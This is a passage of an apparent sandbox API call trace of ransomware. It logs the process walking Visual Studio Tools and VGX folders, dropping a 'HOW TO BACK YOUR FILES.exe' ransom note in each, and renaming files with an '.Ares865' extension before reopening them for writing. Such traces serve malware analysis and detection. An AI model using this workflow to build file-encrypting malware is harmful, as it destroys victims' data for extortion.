lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0148.508] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0148.509] lstrcpyW (in: lpString1=0x2cce4fc, lpString2="Microsoft.VisualStudio.Tools.Office.AppInfoDocument.v9.0.dll" | out: lpString1="Microsoft.VisualStudio.Tools.Office.AppInfoDocument.v9.0.dll") returned="Microsoft.VisualStudio.Tools.Office.AppInfoDocument.v9.0.dll" [0148.509] lstrlenW (lpString="Microsoft.VisualStudio.Tools.Office.AppInfoDocument.v9.0.dll") returned 60 [0148.509] lstrlenW (lpString="Ares865") returned 7 [0148.509] lstrcmpiW (lpString1="9.0.dll", lpString2="Ares865") returned -1 [0148.509] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\AppInfoDocument\\Microsoft.VisualStudio.Tools.Office.AppInfoDocument\\Microsoft.VisualStudio.Tools.Office.AppInfoDocument.v9.0.dll.Ares865") returned 194 [0148.509] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\AppInfoDocument\\Microsoft.VisualStudio.Tools.Office.AppInfoDocument\\Microsoft.VisualStudio.Tools.Office.AppInfoDocument.v9.0.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\appinfodocument\\microsoft.visualstudio.tools.office.appinfodocument\\microsoft.visualstudio.tools.office.appinfodocument.v9.0.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\AppInfoDocument\\Microsoft.VisualStudio.Tools.Office.AppInfoDocument\\Microsoft.VisualStudio.Tools.Office.AppInfoDocument.v9.0.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\appinfodocument\\microsoft.visualstudio.tools.office.appinfodocument\\microsoft.visualstudio.tools.office.appinfodocument.v9.0.dll.ares865"), dwFlags=0x1) returned 1 [0148.511] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\AppInfoDocument\\Microsoft.VisualStudio.Tools.Office.AppInfoDocument\\Microsoft.VisualStudio.Tools.Office.AppInfoDocument.v9.0.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\appinfodocument\\microsoft.visualstudio.tools.office.appinfodocument\\microsoft.visualstudio.tools.office.appinfodocument.v9.0.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0148.511] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=131072) returned 1 [0148.511] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0148.511] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0148.511] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0160 [0148.520] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0" [0148.520] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f02f8 | out: hHeap=0x2b0000) returned 1 [0148.520] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7bc8 | out: hHeap=0x2b0000) returned 1 [0148.520] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0") returned 61 [0148.520] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0" [0148.520] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0148.520] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\8.0\\how to back your files.exe"), bFailIfExists=1) returned 0 [0148.521] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0148.529] GetLastError () returned 0x0 [0148.533] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0148.533] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0148.533] CloseHandle (hObject=0x120) returned 1 [0148.533] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0148.533] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0148.533] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x52622770, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x535f0300, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x535f0300, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0148.534] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0148.534] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0148.534] lstrcpyW (in: lpString1=0x2cce47c, lpString2="Microsoft.VisualStudio.Tools.Applications.Blueprints.tlb" | out: lpString1="Microsoft.VisualStudio.Tools.Applications.Blueprints.tlb") returned="Microsoft.VisualStudio.Tools.Applications.Blueprints.tlb" [0148.534] lstrlenW (lpString="Microsoft.VisualStudio.Tools.Applications.Blueprints.tlb") returned 56 [0148.534] lstrlenW (lpString="Ares865") returned 7 [0148.534] lstrcmpiW (lpString1="nts.tlb", lpString2="Ares865") returned 1 [0148.534] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\Microsoft.VisualStudio.Tools.Applications.Blueprints.tlb.Ares865") returned 126 [0148.534] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\Microsoft.VisualStudio.Tools.Applications.Blueprints.tlb" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\8.0\\microsoft.visualstudio.tools.applications.blueprints.tlb"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\Microsoft.VisualStudio.Tools.Applications.Blueprints.tlb.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\8.0\\microsoft.visualstudio.tools.applications.blueprints.tlb.ares865"), dwFlags=0x1) returned 1 [0148.536] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\Microsoft.VisualStudio.Tools.Applications.Blueprints.tlb.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\8.0\\microsoft.visualstudio.tools.applications.blueprints.tlb.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0148.536] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=30208) returned 1 [0148.536] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0148.536] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0148.536] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f02f8 [0148.567] lstrcpyW (in: lpString1=0x2cce47c, lpString2="Microsoft.VisualStudio.Tools.Applications.DesignTime.tlb" | out: lpString1="Microsoft.VisualStudio.Tools.Applications.DesignTime.tlb") returned="Microsoft.VisualStudio.Tools.Applications.DesignTime.tlb" [0148.567] lstrlenW (lpString="Microsoft.VisualStudio.Tools.Applications.DesignTime.tlb") returned 56 [0148.567] lstrlenW (lpString="Ares865") returned 7 [0148.567] lstrcmpiW (lpString1="ime.tlb", lpString2="Ares865") returned 1 [0148.567] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\Microsoft.VisualStudio.Tools.Applications.DesignTime.tlb.Ares865") returned 126 [0148.567] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\Microsoft.VisualStudio.Tools.Applications.DesignTime.tlb" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\8.0\\microsoft.visualstudio.tools.applications.designtime.tlb"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\Microsoft.VisualStudio.Tools.Applications.DesignTime.tlb.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\8.0\\microsoft.visualstudio.tools.applications.designtime.tlb.ares865"), dwFlags=0x1) returned 1 [0148.570] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\Microsoft.VisualStudio.Tools.Applications.DesignTime.tlb.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\8.0\\microsoft.visualstudio.tools.applications.designtime.tlb.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0148.570] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=11264) returned 1 [0148.570] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0148.570] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0148.570] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f02f8 [0148.602] lstrcpyW (in: lpString1=0x2cce47c, lpString2="VSTARemotingServer.tlb" | out: lpString1="VSTARemotingServer.tlb") returned="VSTARemotingServer.tlb" [0148.602] lstrlenW (lpString="VSTARemotingServer.tlb") returned 22 [0148.602] lstrlenW (lpString="Ares865") returned 7 [0148.602] lstrcmpiW (lpString1="ver.tlb", lpString2="Ares865") returned 1 [0148.602] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\VSTARemotingServer.tlb.Ares865") returned 92 [0148.602] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\VSTARemotingServer.tlb" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\8.0\\vstaremotingserver.tlb"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\VSTARemotingServer.tlb.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\8.0\\vstaremotingserver.tlb.ares865"), dwFlags=0x1) returned 1 [0148.605] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\VSTARemotingServer.tlb.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\8.0\\vstaremotingserver.tlb.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0148.605] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2292) returned 1 [0148.605] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0148.605] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0148.605] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f02f8 [0148.616] lstrcpyW (in: lpString1=0x2cce47c, lpString2="x86" | out: lpString1="x86") returned="x86" [0148.617] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7bc8 [0148.617] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x84) returned 0x2e95b0 [0148.617] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7bd0 | out: ListHead=0x2e7710, ListEntry=0x2e7bd0) returned 0x2e7b70 [0148.617] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5272d110, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x53616460, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53616460, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="x86", cAlternateFileName="")) returned 0 [0148.617] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0148.617] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7bd0 [0148.617] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\x86", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\x86") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\x86" [0148.617] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e95b0 | out: hHeap=0x2b0000) returned 1 [0148.617] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7bc8 | out: hHeap=0x2b0000) returned 1 [0148.617] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\x86") returned 65 [0148.617] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\x86" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\x86") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\x86" [0148.617] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0148.617] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\x86\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\8.0\\x86\\how to back your files.exe"), bFailIfExists=1) returned 0 [0148.618] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0148.619] GetLastError () returned 0x0 [0148.619] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0148.619] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0148.619] CloseHandle (hObject=0x120) returned 1 [0148.619] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0148.619] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0148.619] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\x86\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5272d110, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x53616460, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53616460, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0148.619] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0148.619] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0148.619] lstrcpyW (in: lpString1=0x2cce484, lpString2="VSTARemotingServer.dll" | out: lpString1="VSTARemotingServer.dll") returned="VSTARemotingServer.dll" [0148.619] lstrlenW (lpString="VSTARemotingServer.dll") returned 22 [0148.619] lstrlenW (lpString="Ares865") returned 7 [0148.619] lstrcmpiW (lpString1="ver.dll", lpString2="Ares865") returned 1 [0148.620] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\x86\\VSTARemotingServer.dll.Ares865") returned 96 [0148.620] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\x86\\VSTARemotingServer.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\8.0\\x86\\vstaremotingserver.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\x86\\VSTARemotingServer.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\8.0\\x86\\vstaremotingserver.dll.ares865"), dwFlags=0x1) returned 1 [0148.621] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\x86\\VSTARemotingServer.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\8.0\\x86\\vstaremotingserver.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0148.621] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=31576) returned 1 [0148.621] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0148.622] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0148.622] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f02f8 [0148.635] lstrcpyW (in: lpString1=0x2cce484, lpString2="vsta_ep32.exe" | out: lpString1="vsta_ep32.exe") returned="vsta_ep32.exe" [0148.635] lstrlenW (lpString="vsta_ep32.exe") returned 13 [0148.635] lstrlenW (lpString="Ares865") returned 7 [0148.635] lstrcmpiW (lpString1="p32.exe", lpString2="Ares865") returned 1 [0148.635] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\x86\\vsta_ep32.exe.Ares865") returned 87 [0148.635] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\x86\\vsta_ep32.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\8.0\\x86\\vsta_ep32.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\x86\\vsta_ep32.exe.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\8.0\\x86\\vsta_ep32.exe.ares865"), dwFlags=0x1) returned 1 [0148.637] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\x86\\vsta_ep32.exe.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\8.0\\x86\\vsta_ep32.exe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0148.637] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=19280) returned 1 [0148.637] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0148.638] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0148.638] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f02f8 [0148.665] lstrcpyW (in: lpString1=0x2cce484, lpString2="vsta_ep32.exe.config" | out: lpString1="vsta_ep32.exe.config") returned="vsta_ep32.exe.config" [0148.665] lstrlenW (lpString="vsta_ep32.exe.config") returned 20 [0148.665] lstrlenW (lpString="Ares865") returned 7 [0148.665] lstrcmpiW (lpString1=".config", lpString2="Ares865") returned -1 [0148.665] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\x86\\vsta_ep32.exe.config.Ares865") returned 94 [0148.665] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\x86\\vsta_ep32.exe.config" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\8.0\\x86\\vsta_ep32.exe.config"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\x86\\vsta_ep32.exe.config.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\8.0\\x86\\vsta_ep32.exe.config.ares865"), dwFlags=0x1) returned 1 [0148.668] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\x86\\vsta_ep32.exe.config.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\8.0\\x86\\vsta_ep32.exe.config.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0148.668] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=116) returned 1 [0148.668] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0148.669] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0148.669] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f02f8 [0148.693] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VGX", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VGX") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VGX" [0148.693] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1a08 | out: hHeap=0x2b0000) returned 1 [0148.693] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b68 | out: hHeap=0x2b0000) returned 1 [0148.693] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VGX") returned 56 [0148.693] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VGX" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VGX") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VGX" [0148.693] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0148.693] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VGX\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vgx\\how to back your files.exe"), bFailIfExists=1) returned 0 [0148.694] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0148.695] GetLastError () returned 0x0 [0148.695] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0148.695] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0148.695] CloseHandle (hObject=0x120) returned 1 [0148.695] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0148.695] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0148.695] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VGX\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x5363c5c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5363c5c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0148.695] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0148.695] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0148.696] lstrcpyW (in: lpString1=0x2cce472, lpString2="VGX.dll" | out: lpString1="VGX.dll") returned="VGX.dll" [0148.696] lstrlenW (lpString="VGX.dll") returned 7 [0148.696] lstrlenW (lpString="Ares865") returned 7 [0148.696] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VGX\\VGX.dll.Ares865") returned 72 [0148.696] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VGX\\VGX.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vgx\\vgx.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VGX\\VGX.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vgx\\vgx.dll.ares865"), dwFlags=0x1) returned 1 [0148.698] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VGX\\VGX.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vgx\\vgx.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0148.698] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=759296) returned 1 [0148.698] RtlAllocateHeap 